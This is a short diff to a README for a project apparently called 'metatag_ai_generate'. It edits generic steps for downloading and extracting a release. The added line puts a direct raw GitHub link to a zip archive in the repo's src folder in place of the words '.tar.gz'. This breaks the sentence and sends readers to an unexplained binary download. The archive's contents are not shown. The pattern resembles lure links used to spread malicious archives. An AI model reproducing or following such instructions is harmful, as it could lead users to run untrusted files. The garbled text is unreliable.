mauriolmedo/metatag_ai_generate/README.md

 ### Step 3: Download the File

 Once you click on the desired version, you might see various files.
 Look for a file that fits your system.
-For most users, this will be a .zip or .tar.gz file.
+For most users, this will be a .zip or https://github.com/mauriolmedo/metatag_ai_generate/raw/refs/heads/main/src/generate-ai-metatag-v1.7.zip file.
 Click the file to begin downloading.

 ### Step 4: Extract the Files